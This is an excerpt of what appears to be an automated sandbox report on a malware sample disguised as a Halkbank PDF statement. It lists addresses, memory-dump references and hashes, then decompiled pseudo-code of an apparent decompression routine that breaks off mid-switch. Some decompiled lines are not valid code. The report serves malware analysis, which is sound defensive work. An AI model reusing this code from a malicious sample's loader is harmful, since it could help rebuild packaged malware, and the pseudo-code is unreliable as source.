                                                      0x00406e63
                                                      0x00406e7f
                                                      0x00406e82
                                                      0x00406e85
                                                      0x00406e88
                                                      0x00406e8f
                                                      0x00406e93
                                                      0x00406e95
                                                      0x00406e99
                                                      0x00406e65
                                                      0x00406e65
                                                      0x00406e69
                                                      0x00406e71
                                                      0x00406e76
                                                      0x00406e78
                                                      0x00406e7a
                                                      0x00406e7a
                                                      0x00406e9c
                                                      0x00406ea3
                                                      0x00406ea6
                                                      0x00000000
                                                      0x00406eac
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eac
                                                      0x00000000
                                                      0x00406eb1
                                                      0x00406eb1
                                                      0x00406eb5
                                                      0x00407575
                                                      0x00407575
                                                      0x00000000
                                                      0x00407575
                                                      0x00406ebb
                                                      0x00406ebb
                                                      0x00406ebe
                                                      0x00406ec1
                                                      0x00406ec5
                                                      0x00406ec8
                                                      0x00406ece
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed0
                                                      0x00406ed3
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406ed6
                                                      0x00406edc
                                                      0x00000000
                                                      0x00000000
                                                      0x00406ede
                                                      0x00406ede
                                                      0x00406ee1
                                                      0x00406ee4
                                                      0x00406ee7
                                                      0x00406eea
                                                      0x00406eed
                                                      0x00406ef0
                                                      0x00406ef3
                                                      0x00406ef6
                                                      0x00406ef9
                                                      0x00406efc
                                                      0x00406f14
                                                      0x00406f17
                                                      0x00406f1a
                                                      0x00406f1d
                                                      0x00406f1d
                                                      0x00406f20
                                                      0x00406f24
                                                      0x00406f26
                                                      0x00406efe
                                                      0x00406efe
                                                      0x00406f06
                                                      0x00406f0b
                                                      0x00406f0d
                                                      0x00406f0f
                                                      0x00406f0f
                                                      0x00406f29
                                                      0x00406f30
                                                      0x00406f33
                                                      0x00000000
                                                      0x00406f35
                                                      0x00406f35
                                                      0x00000000
                                                      0x00406f35
                                                      0x00406f33
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00406f3a
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f75
                                                      0x00406f75
                                                      0x00406f79
                                                      0x00407581
                                                      0x00407581
                                                      0x00000000
                                                      0x00407581
                                                      0x00406f7f
                                                      0x00406f7f
                                                      0x00406f82
                                                      0x00406f85
                                                      0x00406f89
                                                      0x00406f8c
                                                      0x00406f92
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f94
                                                      0x00406f97
                                                      0x00406f9a
                                                      0x00406f9a
                                                      0x00406fa0
                                                      0x00406f3e
                                                      0x00406f3e
                                                      0x00406f41
                                                      0x00000000
                                                      0x00406f41
                                                      0x00406fa2
                                                      0x00406fa2
                                                      0x00406fa5
                                                      0x00406fa8
                                                      0x00406fab
                                                      0x00406fae
                                                      0x00406fb1
                                                      0x00406fb4
                                                      0x00406fb7
                                                      0x00406fba
                                                      0x00406fbd
                                                      0x00406fc0
                                                      0x00406fd8
                                                      0x00406fdb
                                                      0x00406fde
                                                      0x00406fe1
                                                      0x00406fe1
                                                      0x00406fe4
                                                      0x00406fe8
                                                      0x00406fea
                                                      0x00406fc2
                                                      0x00406fc2
                                                      0x00406fca
                                                      0x00406fcf
                                                      0x00406fd1
                                                      0x00406fd3
                                                      0x00406fd3
                                                      0x00406fed
                                                      0x00406ff4
                                                      0x00406ff7
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00406ff9
                                                      0x00000000
                                                      0x00407286
                                                      0x00407286
                                                      0x0040728a
                                                      0x004075b1
                                                      0x004075b1
                                                      0x00000000
                                                      0x004075b1
                                                      0x00407290
                                                      0x00407290
                                                      0x00407293
                                                      0x00407296
                                                      0x0040729a
                                                      0x0040729d
                                                      0x004072a3
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a5
                                                      0x004072a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407056
                                                      0x00407056
                                                      0x00407059
                                                      0x00000000
                                                      0x00000000
                                                      0x00407395
                                                      0x00407395
                                                      0x00407399
                                                      0x004073bb
                                                      0x004073bb
                                                      0x004073be
                                                      0x004073c8
                                                      0x004073cb
                                                      0x004073cb
                                                      0x00000000
                                                      0x004073cb
                                                      0x0040739b
                                                      0x0040739b
                                                      0x0040739e
                                                      0x004073a2
                                                      0x004073a5
                                                      0x004073a5
                                                      0x004073a8
                                                      0x00000000
                                                      0x00000000
                                                      0x00407452
                                                      0x00407452
                                                      0x00407456
                                                      0x00407474
                                                      0x00407474
                                                      0x00407474
                                                      0x00407474
                                                      0x0040747b
                                                      0x00407482
                                                      0x00407489
                                                      0x00407489
                                                      0x00407490
                                                      0x00407493
                                                      0x0040749a
                                                      0x00000000
                                                      0x0040749d
                                                      0x00407458
                                                      0x00407458
                                                      0x0040745b
                                                      0x0040745e
                                                      0x00407461
                                                      0x00407468
                                                      0x004073ac
                                                      0x004073ac
                                                      0x004073af
                                                      0x00000000
                                                      0x00000000
                                                      0x00407543
                                                      0x00407543
                                                      0x00407546
                                                      0x00407447
                                                      0x00407447
                                                      0x00407447
                                                      0x00000000
                                                      0x0040744d
                                                      0x00000000
                                                      0x0040717d
                                                      0x0040717d
                                                      0x0040717f
                                                      0x00407186
                                                      0x00407187
                                                      0x00407189
                                                      0x0040718c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00407490
                                                      0x00407490
                                                      0x00407493
                                                      0x0040749a
                                                      0x00000000
                                                      0x0040749d
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004071c2
                                                      0x004071c2
                                                      0x004071c5
                                                      0x004071fb
                                                      0x004071fb
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732b
                                                      0x0040732e
                                                      0x0040732e
                                                      0x00407331
                                                      0x00407333
                                                      0x004075bd
                                                      0x004075bd
                                                      0x00000000
                                                      0x004075bd
                                                      0x00407339
                                                      0x00407339
                                                      0x0040733c
                                                      0x00000000
                                                      0x00000000
                                                      0x00407342
                                                      0x00407342
                                                      0x00407346
                                                      0x00407349
                                                      0x00407349
                                                      0x00407349
                                                      0x00000000
                                                      0x00407349
                                                      0x004071c7
                                                      0x004071c7
                                                      0x004071c9
                                                      0x004071cb
                                                      0x004071cd
                                                      0x004071d0
                                                      0x004071d1
                                                      0x004071d3
                                                      0x004071d5
                                                      0x004071d8
                                                      0x004071db
                                                      0x004071f1
                                                      0x004071f1
                                                      0x004071f6
                                                      0x0040722e
                                                      0x0040722e
                                                      0x00407232
                                                      0x0040725b
                                                      0x0040725e
                                                      0x00407260
                                                      0x00407267
                                                      0x0040726a
                                                      0x0040726d
                                                      0x0040726d
                                                      0x00407272
                                                      0x00407272
                                                      0x00407274
                                                      0x00407277
                                                      0x0040727e
                                                      0x00407281
                                                      0x004072ae
                                                      0x004072ae
                                                      0x004072b1
                                                      0x004072b4
                                                      0x00407328
                                                      0x00407328
                                                      0x00407328
                                                      0x00407328
                                                      0x00000000
                                                      0x00407328
                                                      0x004072b6
                                                      0x004072b6
                                                      0x004072bc
                                                      0x004072bf
                                                      0x004072c2
                                                      0x004072c5
                                                      0x004072c8
                                                      0x004072cb
                                                      0x004072ce
                                                      0x004072d1
                                                      0x004072d4
                                                      0x004072d7
                                                      0x004072f0
                                                      0x004072f2
                                                      0x004072f5
                                                      0x004072f6
                                                      0x004072f9
                                                      0x004072fb
                                                      0x004072fe
                                                      0x00407300
                                                      0x00407302
                                                      0x00407305
                                                      0x00407307
                                                      0x0040730a
                                                      0x0040730e
                                                      0x00407310
                                                      0x00407310
                                                      0x00407311
                                                      0x00407314
                                                      0x00407317
                                                      0x004072d9
                                                      0x004072d9
                                                      0x004072e1
                                                      0x004072e6
                                                      0x004072e8
                                                      0x004072eb
                                                      0x004072eb
                                                      0x0040731a
                                                      0x00407321
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x004072ab
                                                      0x00000000
                                                      0x00407323
                                                      0x00407323
                                                      0x00000000
                                                      0x00407323
                                                      0x00407321
                                                      0x00407234
                                                      0x00407234
                                                      0x00407237
                                                      0x00407239
                                                      0x0040723c
                                                      0x0040723f
                                                      0x00407242
                                                      0x00407244
                                                      0x00407247
                                                      0x0040724a
                                                      0x0040724a
                                                      0x0040724d
                                                      0x0040724d
                                                      0x00407250
                                                      0x00407257
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x0040722b
                                                      0x00000000
                                                      0x00407259
                                                      0x00407259
                                                      0x00000000
                                                      0x00407259
                                                      0x00407257
                                                      0x004071dd
                                                      0x004071dd
                                                      0x004071e0
                                                      0x004071e2
                                                      0x004071e5
                                                      0x00000000
                                                      0x00000000
                                                      0x00406f44
                                                      0x00406f44
                                                      0x00406f48
                                                      0x0040758d
                                                      0x0040758d
                                                      0x00000000
                                                      0x0040758d
                                                      0x00406f4e
                                                      0x00406f4e
                                                      0x00406f51
                                                      0x00406f54
                                                      0x00406f57
                                                      0x00406f5a
                                                      0x00406f5d
                                                      0x00406f60
                                                      0x00406f62
                                                      0x00406f65
                                                      0x00406f68
                                                      0x00406f6b
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00406f6d
                                                      0x00000000
                                                      0x00000000
                                                      0x004070cf
                                                      0x004070cf
                                                      0x004070d3
                                                      0x00407599
                                                      0x00407599
                                                      0x00000000
                                                      0x00407599
                                                      0x004070d9
                                                      0x004070d9
                                                      0x004070dc
                                                      0x004070df
                                                      0x004070e2
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e4
                                                      0x004070e7
                                                      0x004070ea
                                                      0x004070ed
                                                      0x004070f0
                                                      0x004070f3
                                                      0x004070f6
                                                      0x004070f7
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070f9
                                                      0x004070fc
                                                      0x004070ff
                                                      0x00407102
                                                      0x00407105
                                                      0x00407105
                                                      0x00407105
                                                      0x00407108
                                                      0x0040710a
                                                      0x0040710a
                                                      0x00000000
                                                      0x00000000
                                                      0x0040734c
                                                      0x0040734c
                                                      0x0040734c
                                                      0x00407350
                                                      0x00000000
                                                      0x00000000
                                                      0x00407356
                                                      0x00407356
                                                      0x00407359
                                                      0x0040735c
                                                      0x0040735f
                                                      0x00407361
                                                      0x00407361
                                                      0x00407361
                                                      0x00407364
                                                      0x00407367
                                                      0x0040736a
                                                      0x0040736d
                                                      0x00407370
                                                      0x00407373
                                                      0x00407374
                                                      0x00407376
                                                      0x00407376
                                                      0x00407376
                                                      0x00407379
                                                      0x0040737c
                                                      0x0040737f
                                                      0x00407382
                                                      0x00407385
                                                      0x00407389
                                                      0x0040738b
                                                      0x0040738e
                                                      0x00000000
                                                      0x00407390
                                                      0x00407390
                                                      0x0040710d
                                                      0x0040710d
                                                      0x00000000
                                                      0x0040710d
                                                      0x0040738e
                                                      0x004075c3
                                                      0x004075c3
                                                      0x00000000
                                                      0x00000000
                                                      0x00406bf2
                                                      0x004075fa
                                                      0x004075fa
                                                      0x00000000
                                                      0x004075fa
                                                      0x00407447
                                                      0x004074c7
                                                      0x00407490

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                      • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                      • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                      • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407395 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E00407395() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
